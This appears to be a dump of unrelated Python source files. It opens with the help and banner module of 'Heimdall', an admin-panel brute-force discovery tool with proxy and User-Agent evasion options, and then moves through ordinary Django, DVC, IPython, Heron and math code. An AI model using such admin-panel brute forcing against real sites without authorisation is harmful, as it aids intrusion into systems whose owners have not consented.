Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from src.core.config import Config
from src.core.color import Color
class Strings(Config):
def __init__(self):
"""
Constructor and Attributes
"""
super().__init__()
@staticmethod
def helper():
print("""
Usage: python3 heimdall.py --help
Description: Heimdall is an open source tool designed to automate fetching
from a target site's admin panel using brute force in the wordlist.
Optional Arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (http://testphp.vulnweb.com/)
-t, --threads Set threads number. Default: 8
--wordlist (1, 2, 3) Set wordlist. Default: 1 (Small) and Max: 3 (Big)
-p, --proxy Use a proxy to connect to the target URL
--random-proxy Use a random anonymous proxy
--user-agent Customize the User-Agent. Default: Random User-Agent
--no-redirects Option to disregard redirects to avoid false positives.
--update Upgrade Heimdall to its latest available version.
--no-update Disables the intention of updates
--no-logo Disable the initial banner\n""")
@staticmethod
def banner():
"""Print the pure colored Heimdall banner."""
Color.println(r"""{O}________________________________________________________________
_ _ _ _
/\ /\___(_)_ __ ___ __| | __ _| | |
/ /_/ / _ \ | '_ ` _ \ / _` |/ _` | | |
/ __ / __/ | | | | | | (_| | (_| | | |
\/ /_/ \___|_|_| |_| |_|\__,_|\__,_|_|_|{W}""")
def banner_description(self):
"""Print design and author specifications."""
print(f"""\n Version: {self.get_version}
Author: {self.get_author} (Security Researcher)
GitHub: {self.get_github}""")
Color.println("{O}________________________________________________________________{W}\n")
if __name__ == '__main__':
String = Strings()
String.banner()
String.banner_description()
|
"""Template tags for working with lists of items."""
from django import template
from soclone.utils.lists import batch_size, batches
register = template.Library()
@register.filter
def in_batches_of_size(items, size):
"""
Retrieves items in batches of the given size.
"""
return batch_size(items, int(size))
@register.filter
def in_batches(items, number):
"""
Retrieves items in the given number of batches.
"""
return batches(items, int(number))
|
"""
Pipelines that perform many operations at once (eg. tracking all particles from a directory of images), and help scripts.
"""
from .ForceSolve import *
from .TrialObject import *
|
import os
import pytest
from voluptuous import Schema as _Schema
from dvc import output
from dvc.dvcfile import PIPELINE_FILE
from dvc.schema import SINGLE_PIPELINE_STAGE_SCHEMA
from dvc.stage import PipelineStage, create_stage
from dvc.stage.serialize import to_pipeline_file as _to_pipeline_file
kwargs = {"name": "something", "cmd": "command", "path": PIPELINE_FILE}
Schema = _Schema(SINGLE_PIPELINE_STAGE_SCHEMA)
def to_pipeline_file(stage):
"""Validate schema on each serialization."""
e = _to_pipeline_file(stage)
assert len(Schema(e)) == 1
return e
def test_cmd(dvc):
stage = create_stage(PipelineStage, dvc, **kwargs)
entry = to_pipeline_file(stage)
assert entry == {"something": {"cmd": "command"}}
def test_wdir(dvc):
stage = create_stage(PipelineStage, dvc, **kwargs)
assert stage.PARAM_WDIR not in to_pipeline_file(stage)["something"]
stage.wdir = os.curdir
assert stage.PARAM_WDIR not in to_pipeline_file(stage)["something"]
stage.wdir = "some-dir"
assert to_pipeline_file(stage)["something"][stage.PARAM_WDIR] == "some-dir"
def test_deps_sorted(dvc):
stage = create_stage(
PipelineStage, dvc, deps=["a", "quick", "lazy", "fox"], **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_DEPS] == [
"a",
"fox",
"lazy",
"quick",
]
def test_outs_sorted(dvc):
stage = create_stage(
PipelineStage,
dvc,
outs=["too", "many", "outs"],
deps=["foo"],
**kwargs,
)
assert to_pipeline_file(stage)["something"][stage.PARAM_OUTS] == [
"many",
"outs",
"too",
]
def test_params_sorted(dvc):
params = [
"lorem",
"ipsum",
{"custom.yaml": ["wxyz", "pqrs", "baz"]},
{"params.yaml": ["barr"]},
]
stage = create_stage(
PipelineStage, dvc, outs=["bar"], deps=["foo"], params=params, **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_PARAMS] == [
"barr",
"ipsum",
"lorem",
{"custom.yaml": ["baz", "pqrs", "wxyz"]},
]
def test_params_file_sorted(dvc):
params = [
"lorem",
"ipsum",
{"custom.yaml": ["wxyz", "pqrs", "baz"]},
{"a-file-of-params.yaml": ["barr"]},
]
stage = create_stage(
PipelineStage, dvc, outs=["bar"], deps=["foo"], params=params, **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_PARAMS] == [
"ipsum",
"lorem",
{"a-file-of-params.yaml": ["barr"]},
{"custom.yaml": ["baz", "pqrs", "wxyz"]},
]
def test_params_file_without_targets(dvc):
params = [
"foo",
"bar",
{"params.yaml": None},
{"custom.yaml": ["wxyz", "pqrs", "baz"]},
{"a-file-of-params.yaml": None},
{"a-file-of-params.yaml": ["barr"]},
]
stage = create_stage(
PipelineStage, dvc, outs=["bar"], deps=["foo"], params=params, **kwargs
)
assert to_pipeline_file(stage)["something"][stage.PARAM_PARAMS] == [
{"a-file-of-params.yaml": None},
{"custom.yaml": ["baz", "pqrs", "wxyz"]},
{"params.yaml": None},
]
@pytest.mark.parametrize(
"typ, extra",
[("plots", {"plot": True}), ("metrics", {"metric": True}), ("outs", {})],
)
def test_outs_and_outs_flags_are_sorted(dvc, typ, extra):
stage = create_stage(PipelineStage, dvc, deps=["input"], **kwargs)
stage.outs += output.loads_from(stage, ["barr"], use_cache=False, **extra)
stage.outs += output.loads_from(
stage, ["foobar"], use_cache=False, persist=True, **extra
)
stage.outs += output.loads_from(stage, ["foo"], persist=True, **extra)
stage.outs += output.loads_from(stage, ["bar"], **extra)
serialized_outs = to_pipeline_file(stage)["something"][typ]
assert serialized_outs == [
"bar",
{"barr": {"cache": False}},
{"foo": {"persist": True}},
{"foobar": {"cache": False, "persist": True}},
]
assert list(serialized_outs[3]["foobar"].keys()) == ["cache", "persist"]
def test_plot_props(dvc):
props = {"x": "1"}
stage = create_stage(PipelineStage, dvc, plots=["plot_file"], **kwargs)
stage.outs[0].plot = props
assert to_pipeline_file(stage)["something"][stage.PARAM_PLOTS] == [
{"plot_file": props}
]
def test_frozen(dvc):
stage = create_stage(
PipelineStage, dvc, outs=["output"], deps=["input"], **kwargs
)
assert stage.PARAM_FROZEN not in to_pipeline_file(stage)["something"]
stage = create_stage(PipelineStage, dvc, **kwargs, frozen=True)
assert to_pipeline_file(stage)["something"][stage.PARAM_FROZEN] is True
def test_always_changed(dvc):
stage = create_stage(
PipelineStage, dvc, outs=["output"], deps=["input"], **kwargs
)
assert (
stage.PARAM_ALWAYS_CHANGED not in to_pipeline_file(stage)["something"]
)
stage = create_stage(PipelineStage, dvc, **kwargs, always_changed=True)
assert (
to_pipeline_file(stage)["something"][stage.PARAM_ALWAYS_CHANGED]
is True
)
def test_order(dvc):
stage = create_stage(
PipelineStage,
dvc,
outs=["output"],
deps=["input"],
**kwargs,
always_changed=True,
frozen=True,
)
# `create_stage` checks for existence of `wdir`
stage.wdir = "some-dir"
assert list(to_pipeline_file(stage)["something"].keys()) == [
"cmd",
"wdir",
"deps",
"outs",
"frozen",
"always_changed",
]
@pytest.mark.parametrize(
"typ", ["outs", "metrics", "plots", "params", "deps", None]
)
def test_order_deps_outs(dvc, typ):
all_types = ["deps", "params", "outs", "metrics", "plots"]
all_types = [item for item in all_types if item != typ]
extra = {key: [f"foo-{i}"] for i, key in enumerate(all_types)}
stage = create_stage(PipelineStage, dvc, **kwargs, **extra)
assert typ not in to_pipeline_file(stage)["something"]
assert (
list(to_pipeline_file(stage)["something"].keys())
== ["cmd"] + all_types
)
|
from datetime import datetime
import sqlalchemy
from loguru import logger
from app.models.user import User
from app.schemas.user import (
UserCreate,
UserIncreaseFileCount,
UpdateUserDownloadStats,
)
from app.services.main import AppService, AppCRUD
from app.utils.app_exceptions import AppException
from app.utils.service_result import ServiceResult
class UserService(AppService):
MAX_FILES_PER_USER = 2
MAX_BYTES_PER_MINUTE = 1024 * 1024 # 1 MB
def create_user(self, user: UserCreate) -> ServiceResult:
new_user = UserCRUD(self.db).create_user(user)
if not new_user:
return ServiceResult(
AppException.UserCreate(context={"error": "Error creating user"})
)
return ServiceResult(new_user)
def can_upload_files(self, user: User, lock_user=False):
"""
Checks if the user is able to upload files.
Current restriction is 99 files per user
This method will lock the user on the DB. So should be followed
by a commit somewhere.
"""
files_count = UserCRUD(self.db).get_files_count_per_user(user.id)
if not lock_user:
self.db.commit()
return files_count < self.MAX_FILES_PER_USER
def can_download_files(self, user: User, lock_user=False):
"""
Checks if the user is able to upload files.
Current restrictions:
- 1MB per minute
This method will lock the user on the DB. So should be followed
by a commit somewhere.
"""
user = UserCRUD(self.db).get_user(user.id)
if not lock_user:
self.db.commit()
last_download_on_last_minute = (
datetime.now() - user.last_download_time
).seconds < 60
if not last_download_on_last_minute:
UserCRUD(self.db).reset_bytes_counter(user)
return True
return user.bytes_read_on_last_minute <= self.MAX_BYTES_PER_MINUTE
def increase_file_count(
self, increase_amount: UserIncreaseFileCount
) -> ServiceResult:
"""
Increase the number of files a user has
There's a limitation of 99 files per user, check this beforehand
:param increase_amount: UserIncreaseFileCount payload
"""
# suppose only 1 user on the system, otherwise use some auth
increase_amount.user_id = 1
result = UserCRUD(self.db).increase_file_count(increase_amount)
if not result:
return ServiceResult(
AppException.UserCreate(
context={"error": "Error increasing file count"}
)
)
return ServiceResult(result)
def update_download_stats(self, user_payload: UpdateUserDownloadStats):
UserCRUD(self.db).update_last_download_stats(user_payload)
class UserCRUD(AppCRUD):
def create_user(self, user_create: UserCreate) -> User:
user = User(**user_create.dict())
self.db.add(user)
try:
self.db.commit()
self.db.refresh(user)
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
user = None
return user
def get_user(self, user_id: int) -> User:
return self.db.query(User).filter(User.id == user_id).with_for_update().first()
def increase_file_count(self, user_payload: UserIncreaseFileCount) -> User:
result = (
self.db.query(User)
.filter(User.id == user_payload.user_id)
.update({User.files_uploaded: User.files_uploaded + 1})
)
try:
self.db.commit()
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
result = None
self.db.commit()
return result
def get_files_count_per_user(self, user_id: int) -> int:
"""
Obtain the files uploaded per user.
NOTE: keep in mind this function locks the user row in particular
until the transaction ends.
Without db.commit() somewhere this could lead to a permanent locked row
on the DB
"""
try:
return (
self.db.query(User.files_uploaded)
.filter(User.id == user_id)
.with_for_update()
.first()[0]
)
except TypeError:
# on error unlock
self.db.commit()
def update_last_download_stats(self, user_payload: UpdateUserDownloadStats):
user = self.get_user(user_id=user_payload.user_id)
user.bytes_read_on_last_minute += user_payload.bytes
user.last_download_time = datetime.now()
try:
self.db.commit()
self.db.refresh(user)
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
return None
return user
def reset_bytes_counter(self, user: User):
user.bytes_read_on_last_minute = 0
try:
self.db.commit()
self.db.refresh(user)
except sqlalchemy.exc.DatabaseError as error:
logger.error(f"{error}")
return None
return user
|
"""This contains all of the forms used by the API application."""
# Django Imports
from django import forms
# 3rd Party Libraries
from crispy_forms.helper import FormHelper
from crispy_forms.layout import HTML, ButtonHolder, Column, Layout, Row, Submit
class ApiKeyForm(forms.Form):
"""
Save an individual :model:`oplog.Oplog`.
"""
name = forms.CharField()
expiry_date = forms.DateTimeField(
input_formats=['%d/%m/%Y %H:%M'],
)
class Meta:
fields = ["name", "expiry_date", ]
def __init__(self, project=None, *args, **kwargs):
super().__init__(*args, **kwargs)
for field in self.fields:
self.fields[field].widget.attrs["autocomplete"] = "off"
self.fields["expiry_date"].widget.input_type = "datetime-local"
# Design form layout with Crispy FormHelper
self.helper = FormHelper()
self.helper.form_show_labels = True
self.helper.form_method = "post"
self.helper.form_class = "newitem"
self.helper.layout = Layout(
Row(
Column("name", css_class="form-group col-6 mb-0"),
Column("expiry_date", css_class="form-group col-6 mb-0"),
css_class="form-group",
),
ButtonHolder(
Submit("submit_btn", "Submit", css_class="btn btn-primary col-md-4"),
HTML(
"""
<button onclick="window.location.href='{{ cancel_link }}'" class="btn btn-outline-secondary col-md-4" type="button">Cancel</button>
"""
),
),
)
|
# Define a procedure, biggest, that takes three
# numbers as inputs and returns the largest of
# those three numbers.
def biggest (n1, n2, n3):
if n1 > n2:
if n1 > n3:
return n1
else:
return n3
if n2 > n3:
return n2
return n3
print biggest(3, 6, 9)
#>>> 9
print biggest(6, 9, 3)
#>>> 9
print biggest(9, 3, 6)
#>>> 9
print biggest(3, 3, 9)
#>>> 9
print biggest(9, 3, 9)
#>>> 9
|
'''
The Sphere manifold can be paramterized using theta and phi
The sphere manifold is isometric to R2 using the conical projection map
The Sphere manifold's laplacian hence must be similar to the laplacian of R2
This experiment would seek to infer the laplacian from given samples, with the manifold being endowed with an inherent metric
'''
from __future__ import print_function
import numpy as np
import tensorflow as tf
class Sphere(object):
def __init__(self, r=1, R1=1, R2=1, theta_base=0, phi_base=0, gamma_base=0) : # three degrees of rotation
self.theta_range = np.pi
self.phi_range = 2*np.pi
self.r = r
self.R1 = R1
self.R2 = R2
self.z_mat = np.array([[np.cos(theta_base), -np.sin(theta_base),0],[np.sin(theta_base), np.cos(theta_base),0],[0 , 0, 1]]).astype(np.float32)
self.x_mat = np.array([[1,0,0], [0, np.cos(phi_base), -np.sin(phi_base)],[0, np.sin(phi_base), np.cos(phi_base)]])
self.y_mat = np.array([[np.cos(gamma_base),0,np.sin(gamma_base)], [0, 1,0], [-np.sin(phi_base), 0, np.cos(phi_base)]])
self.mat1 = np.matmul(self.x_mat, self.z_mat)
self.mat1 = np.matmul(self.y_mat, self.mat1)
self.rmax = 1.0
def _single_point_generator(self):
x = np.random.uniform(0, self.theta_range), np.random.uniform(0, self.phi_range)
return reversed([np.cos(x[0]), (np.sin(x[0])*np.sin(x[1])), (np.sin(x[0])*np.cos(x[1]))])
def _multi_point_generator(self, num):
x = zip(np.random.uniform(0, self.theta_range, num), np.random.uniform(0, self.phi_range, num))
return np.array(map(lambda x : np.matmul(self.mat1, np.array([i for i in reversed([self.r*np.cos(x[0]), (self.R1)*np.sin(x[0])*np.sin(x[1]), (self.R2*np.sin(x[0])*np.cos(x[1]))])])),list(set(x)))) # ensure there are no double matches
def _sphere_inv_metric(self, p1, p2, h):
if np.array_equal(p1,p2) : return 0
a = self._sphere_metric(p1, p2)
return 1.0/a
def _sphere_step_metric(self, p1, p2, h):
if np.array_equal(p1,p2) : return 0
a = self._sphere_metric(p1, p2)
if (a < (self.rmax*h)) :
return 1.0/a
else :
return 0
def _euclidean_step_metric(self, p1, p2, h):
if (p1 == p2).all() : return 0
a = np.sqrt(np.sum(np.square(p1-p2)))
if (a < (self.rmax*h)) :
return 1.0/a
else :
return 0
def _euclidean_metric(self, p1, p2, h):
if (p1 == p2).all() : return 0
return 1.0/np.sqrt(np.sum(np.square(p1-p2))/h**2)
def _cosine_metric(self, p1, p2, h):
return (np.dot(p1, p2) + 1) / (2*h)
def _sphere_metric(self, p1, p2):
p1 = np.matmul(np.linalg.inv(self.y_mat),p1)
p1 = np.matmul(np.linalg.inv(self.x_mat),p1)
p1 = np.matmul(np.linalg.inv(self.z_mat),p1)
p2 = np.matmul(np.linalg.inv(self.y_mat),p2)
p2 = np.matmul(np.linalg.inv(self.x_mat),p2)
p2 = np.matmul(np.linalg.inv(self.z_mat),p2)
theta1 = np.arctan((np.sqrt((p1[0]/self.R2)**2 + (p1[1]/ self.R1)**2) ) / p1[2])
phi1 = np.arctan((self.R2*p1[1])/(self.R1*p1[0]))
if(p1[0] < 0) :
phi1 = np.pi + phi1
theta2 = np.arctan((np.sqrt((p2[0]/self.R2)**2 + (p2[1]/ self.R1)**2) ) / p2[2])
phi2 = np.arctan((self.R2*p2[1])/(self.R1*p2[0]))
if(p2[0] < 0) :
phi2 = np.pi + phi2
val = np.square(theta1 - theta2) / (np.pi*np.pi)
val += np.square(phi1 - phi2) / (4*np.pi*np.pi)
return np.sqrt(val)
def _laplacian_matrix(self, points, h, lambda_val):
kernel_pairwise = np.zeros([points.shape[0]]*2).astype(np.float64)
zero = np.zeros(3)
for i in range(points.shape[0]):
for j in range(points.shape[0]):
if flags.metric == "sphere":
kernel_pairwise[i,j] = self._sphere_metric(points[i] , points[j], h)/h**2
elif flags.metric == "cosine":
kernel_pairwise[i,j] = self._cosine_metric(points[i] , points[j], h)/h**2
elif flags.metric == "sphere_inv":
kernel_pairwise[i,j] = self._sphere_inv_metric(points[i] , points[j], h)/h**2
elif flags.metric == "sphere_step":
kernel_pairwise[i,j] = self._sphere_step_metric(points[i] , points[j], h)/h**2
elif flags.metric == "euclidean_step":
kernel_pairwise[i,j] = self._euclidean_step_metric(points[i] , points[j], h)/h**2
elif flags.metric == "euclidean":
kernel_pairwise[i,j] = self._euclidean_metric(points[i] , points[j], h)/h**2
if (kernel_pairwise[i,j] < 0):
print(str(points[i]) + " :: " + str(points[j]))
assert(kernel_pairwise[i,j] >= 0)
else:
print("Invalid metric type")
exit(1)
kernel_norm = np.mean(kernel_pairwise, axis=1)
adjacency = np.array([[kernel_pairwise[i][j] / (points.shape[0]*(kernel_norm[i]*kernel_norm[j])**lambda_val) for j in range(points.shape[0])] for i in range(points.shape[0])])
for i in range(points.shape[0]):
for j in range(points.shape[0]):
assert(adjacency[i,j] >= 0)
diagonal = np.diag(np.sum(adjacency, axis=1))
diag_sqrt = np.sqrt(diagonal)
diag_sqrt_inv = np.linalg.inv(diag_sqrt)
norm_adj = np.matmul(diag_sqrt_inv, np.matmul(adjacency, diag_sqrt_inv))
laplacian = (1/h**2)*np.matmul(diag_sqrt_inv, np.matmul(diagonal - adjacency, diag_sqrt_inv))
return laplacian
tf.app.flags.DEFINE_string("metric", "sphere", "Metric for computation")
flags = tf.app.flags.FLAGS
if __name__ == "__main__" :
sphere = Sphere()
zero = np.zeros(3)
max_list = []
for i in range(10):
print("Doing for " + str(i), end='\r')
list_pts = sphere._multi_point_generator(200)
w,v = np.linalg.eig(sphere._laplacian_matrix(list_pts, 0.1, 0))
max_list.append(np.sort(w)[-1])
print("Done for " + str(i))
print(np.mean(np.array(max_list)))
|
import io
import json
import os
import shutil
import sys
pjoin = os.path.join
from IPython.utils.path import get_ipython_dir
from IPython.utils.py3compat import PY3
from IPython.utils.traitlets import HasTraits, List, Unicode, Dict, Any, Set
from IPython.config import Configurable
from .launcher import make_ipkernel_cmd
if os.name == 'nt':
programdata = os.environ.get('PROGRAMDATA', None)
if programdata:
SYSTEM_KERNEL_DIRS = [pjoin(programdata, 'jupyter', 'kernels')]
else: # PROGRAMDATA is not defined by default on XP.
SYSTEM_KERNEL_DIRS = []
else:
SYSTEM_KERNEL_DIRS = ["/usr/share/jupyter/kernels",
"/usr/local/share/jupyter/kernels",
]
NATIVE_KERNEL_NAME = 'python3' if PY3 else 'python2'
def _pythonfirst(s):
"Sort key function that will put strings starting with 'python' first."
if s == NATIVE_KERNEL_NAME:
return ' ' + s # Two spaces to sort this first of all
elif s.startswith('python'):
# Space is not valid in kernel names, so this should sort first
return ' ' + s
return s
class KernelSpec(HasTraits):
argv = List()
display_name = Unicode()
language = Unicode()
env = Dict()
resource_dir = Unicode()
@classmethod
def from_resource_dir(cls, resource_dir):
"""Create a KernelSpec object by reading kernel.json
Pass the path to the *directory* containing kernel.json.
"""
kernel_file = pjoin(resource_dir, 'kernel.json')
with io.open(kernel_file, 'r', encoding='utf-8') as f:
kernel_dict = json.load(f)
return cls(resource_dir=resource_dir, **kernel_dict)
def to_dict(self):
d = dict(argv=self.argv,
env=self.env,
display_name=self.display_name,
language=self.language,
)
return d
def to_json(self):
return json.dumps(self.to_dict())
def _is_kernel_dir(path):
"""Is ``path`` a kernel directory?"""
return os.path.isdir(path) and os.path.isfile(pjoin(path, 'kernel.json'))
def _list_kernels_in(dir):
"""Return a mapping of kernel names to resource directories from dir.
If dir is None or does not exist, returns an empty dict.
"""
if dir is None or not os.path.isdir(dir):
return {}
return {f.lower(): pjoin(dir, f) for f in os.listdir(dir)
if _is_kernel_dir(pjoin(dir, f))}
class NoSuchKernel(KeyError):
def __init__(self, name):
self.name = name
class KernelSpecManager(Configurable):
ipython_dir = Unicode()
def _ipython_dir_default(self):
return get_ipython_dir()
user_kernel_dir = Unicode()
def _user_kernel_dir_default(self):
return pjoin(self.ipython_dir, 'kernels')
@property
def env_kernel_dir(self):
return pjoin(sys.prefix, 'share', 'jupyter', 'kernels')
whitelist = Set(config=True,
help="""Whitelist of allowed kernel names.
By default, all installed kernels are allowed.
"""
)
kernel_dirs = List(
help="List of kernel directories to search. Later ones take priority over earlier."
)
def _kernel_dirs_default(self):
dirs = SYSTEM_KERNEL_DIRS[:]
if self.env_kernel_dir not in dirs:
dirs.append(self.env_kernel_dir)
dirs.append(self.user_kernel_dir)
return dirs
@property
def _native_kernel_dict(self):
"""Makes a kernel directory for the native kernel.
The native kernel is the kernel using the same Python runtime as this
process. This will put its information in the user kernels directory.
"""
return {
'argv': make_ipkernel_cmd(),
'display_name': 'Python %i' % (3 if PY3 else 2),
'language': 'python',
}
@property
def _native_kernel_resource_dir(self):
return pjoin(os.path.dirname(__file__), 'resources')
def find_kernel_specs(self):
"""Returns a dict mapping kernel names to resource directories."""
d = {}
for kernel_dir in self.kernel_dirs:
d.update(_list_kernels_in(kernel_dir))
d[NATIVE_KERNEL_NAME] = self._native_kernel_resource_dir
if self.whitelist:
# filter if there's a whitelist
d = {name:spec for name,spec in d.items() if name in self.whitelist}
return d
# TODO: Caching?
def get_kernel_spec(self, kernel_name):
"""Returns a :class:`KernelSpec` instance for the given kernel_name.
Raises :exc:`NoSuchKernel` if the given kernel name is not found.
"""
if kernel_name in {'python', NATIVE_KERNEL_NAME} and \
(not self.whitelist or kernel_name in self.whitelist):
return KernelSpec(resource_dir=self._native_kernel_resource_dir,
**self._native_kernel_dict)
d = self.find_kernel_specs()
try:
resource_dir = d[kernel_name.lower()]
except KeyError:
raise NoSuchKernel(kernel_name)
return KernelSpec.from_resource_dir(resource_dir)
def _get_destination_dir(self, kernel_name, user=False):
if user:
return os.path.join(self.user_kernel_dir, kernel_name)
else:
if SYSTEM_KERNEL_DIRS:
return os.path.join(SYSTEM_KERNEL_DIRS[-1], kernel_name)
else:
raise EnvironmentError("No system kernel directory is available")
def install_kernel_spec(self, source_dir, kernel_name=None, user=False,
replace=False):
"""Install a kernel spec by copying its directory.
If ``kernel_name`` is not given, the basename of ``source_dir`` will
be used.
If ``user`` is False, it will attempt to install into the systemwide
kernel registry. If the process does not have appropriate permissions,
an :exc:`OSError` will be raised.
If ``replace`` is True, this will replace an existing kernel of the same
name. Otherwise, if the destination already exists, an :exc:`OSError`
will be raised.
"""
if not kernel_name:
kernel_name = os.path.basename(source_dir)
kernel_name = kernel_name.lower()
destination = self._get_destination_dir(kernel_name, user=user)
if replace and os.path.isdir(destination):
shutil.rmtree(destination)
shutil.copytree(source_dir, destination)
def install_native_kernel_spec(self, user=False):
"""Install the native kernel spec to the filesystem
This allows a Python 3 frontend to use a Python 2 kernel, or vice versa.
The kernelspec will be written pointing to the Python executable on
which this is run.
If ``user`` is False, it will attempt to install into the systemwide
kernel registry. If the process does not have appropriate permissions,
an :exc:`OSError` will be raised.
"""
path = self._get_destination_dir(NATIVE_KERNEL_NAME, user=user)
os.makedirs(path, mode=0o755)
with open(pjoin(path, 'kernel.json'), 'w') as f:
json.dump(self._native_kernel_dict, f, indent=1)
copy_from = self._native_kernel_resource_dir
for file in os.listdir(copy_from):
shutil.copy(pjoin(copy_from, file), path)
return path
def find_kernel_specs():
"""Returns a dict mapping kernel names to resource directories."""
return KernelSpecManager().find_kernel_specs()
def get_kernel_spec(kernel_name):
"""Returns a :class:`KernelSpec` instance for the given kernel_name.
Raises KeyError if the given kernel name is not found.
"""
return KernelSpecManager().get_kernel_spec(kernel_name)
def install_kernel_spec(source_dir, kernel_name=None, user=False, replace=False):
return KernelSpecManager().install_kernel_spec(source_dir, kernel_name,
user, replace)
install_kernel_spec.__doc__ = KernelSpecManager.install_kernel_spec.__doc__
def install_native_kernel_spec(user=False):
return KernelSpecManager().install_native_kernel_spec(user=user)
install_native_kernel_spec.__doc__ = KernelSpecManager.install_native_kernel_spec.__doc__
|
# Copyright 2016 Twitter. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''ZkStateManager unittest'''
import unittest2 as unittest
from heron.statemgrs.src.python.zkstatemanager import ZkStateManager
class ZkStateManagerTest(unittest.TestCase):
"""Unittest for ZkStateManager"""
class MockKazooClient:
def __init__(self):
self.start_calls = 0
self.stop_calls = 0
def start(self):
self.start_calls = self.start_calls + 1
def stop(self):
self.stop_calls = self.stop_calls + 1
def add_listener(self,listener):
pass
def setUp(self):
# Create a a ZkStateManager that we will test with
self.statemanager = ZkStateManager('zk', [('localhost', 2181), ('localhost', 2281)], 'heron', 'reachable.host')
# replace creation of a KazooClient
self.mock_kazoo = ZkStateManagerTest.MockKazooClient()
self.opened_host_ports = []
def kazoo_client(hostport):
self.opened_host_ports.append(hostport)
return self.mock_kazoo
self.statemanager._kazoo_client = kazoo_client
def test_start_checks_for_connection(self):
global did_connection_check
did_connection_check = False
def connection_check():
global did_connection_check
did_connection_check = True
return True
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.start()
self.assertTrue(did_connection_check)
def test_start_uses_host_ports(self):
def connection_check():
return True
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.start()
self.assertEqual('localhost:2181,localhost:2281',self.opened_host_ports[0])
def test_start_opens_proxy_if_no_connection(self):
def connection_check():
return False
global did_open_proxy
did_open_proxy = False
def open_proxy():
global did_open_proxy
did_open_proxy = True
return [('proxy', 2181), ('proxy-2', 2281)]
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.establish_ssh_tunnel = open_proxy
self.statemanager.start()
self.assertTrue(did_open_proxy)
def test_proxied_start_uses_connection(self):
def connection_check():
return False
def open_proxy():
return [('smorgasboard',2200),('smorgasboard',2201)]
self.statemanager.is_host_port_reachable = connection_check
self.statemanager.establish_ssh_tunnel = open_proxy
self.statemanager.start()
self.assertEqual('smorgasboard:2200,smorgasboard:2201',self.opened_host_ports[0])
|
class Node(object):
"""
Represents a node in a contingent plan.
Only the stated fields are mandatory.
Other optional info can be added by ConfigurationProvider implementations
"""
def __init__(self, id, partial_state, is_initial, is_goal):
self._is_initial = is_initial
self._is_goal = is_goal
self._id = id
self._partial_state = partial_state
@property
def node_id(self):
return self._id
@property
def is_initial(self):
return self._is_initial
@property
def is_goal(self):
return self._is_goal
@property
def partial_state(self):
# partial state defined for the node
return self._partial_state
def __hash__(self):
return hash(self._id)
def __eq__(self, other):
return self.node_id == other.node_id
|
from groups import Group
from operator import itemgetter
class Subgroup(Group):
"""
Define subgroup by generators or by set of elements
"""
def __init__(self, G, gens = None, H = None):
if isinstance(G,Subgroup):
H = list(itemgetter(*H)(G._H)) if len(H)>1 else [G._H[list(H)[0]]]
G = G.G
if H is None:
H = self.__genSubgroup(G, gens)
self.card = len(H)
if type(H) == set:
H = list(H)
H.sort()
self._H = H
d = {H[i]: i for i in range(len(H))}
self.element = lambda k: G[H[k]]
self.index = lambda e: d[e]
self.op = lambda a, b: d[G.op(H[a],H[b])]
self.inverse = lambda g: d[G.inverse(H[g])]
self.abelian = None
self.cyclic = None
self.simple = None
self.id = d[G.identity()]
self.generators = [d[gen] for gen in gens] if gens is not None else None
self.G = G
def __genSubgroup(self, G, gens):
H = [G.identity()]
S = {G.identity()}
size = 1
while True:
for g in gens:
for h in H:
p = G.op(h, g)
if p not in S:
H.append(p)
S.add(p)
if size == len(H):
break
size = len(H)
H.sort()
return H
def __iter__(self):
return SubgroupIter(self)
def __repr__(self):
if self.generators is not None:
return "<"+",".join(str(self.G[g]) for g in self.generators)+">"
else:
return repr(self._H)
class SubgroupIter():
def __init__(self, G):
self.H = G._H
self.index = 0
def __next__(self):
if self.index < len(self.H):
## g = self.H[self.index]
self.index += 1
return self.index-1
raise StopIteration()
|
from django.conf.urls import patterns, include, url
from rest_framework import routers
import views
router = routers.DefaultRouter()
router.register(r'attempt', views.AttemptViewSet, base_name='attempt')
router.register(r'repository', views.RepositoryViewSet, base_name='repository')
urlpatterns = patterns('',
url(r'^api/', include(router.urls)),
url(r'^api/repositories/', views.RepositoryListView.as_view()),
url(r'^$', 'library.views.home', name='home'),
url(r'^repositories/$', 'library.views.repositories', name='repositories'),
url(r'^repository/(?P<user_name>.+)/(?P<repo_name>.+)/', 'library.views.repository', name='repository'),
url(r'^attempt/(?P<id>\d+)/', 'library.views.attempt', name='attempt'),
url(r'^queries/(?P<id>\d+)/', 'library.views.queries', name='queries'),
url(r'^about/$', 'library.views.about', name='about'),
url(r'^search/$', 'library.views.search', name='search')
)
|
#!/usr/bin/env python
# -*- coding: utf-8; py-indent-offset:4 -*-
###############################################################################
#
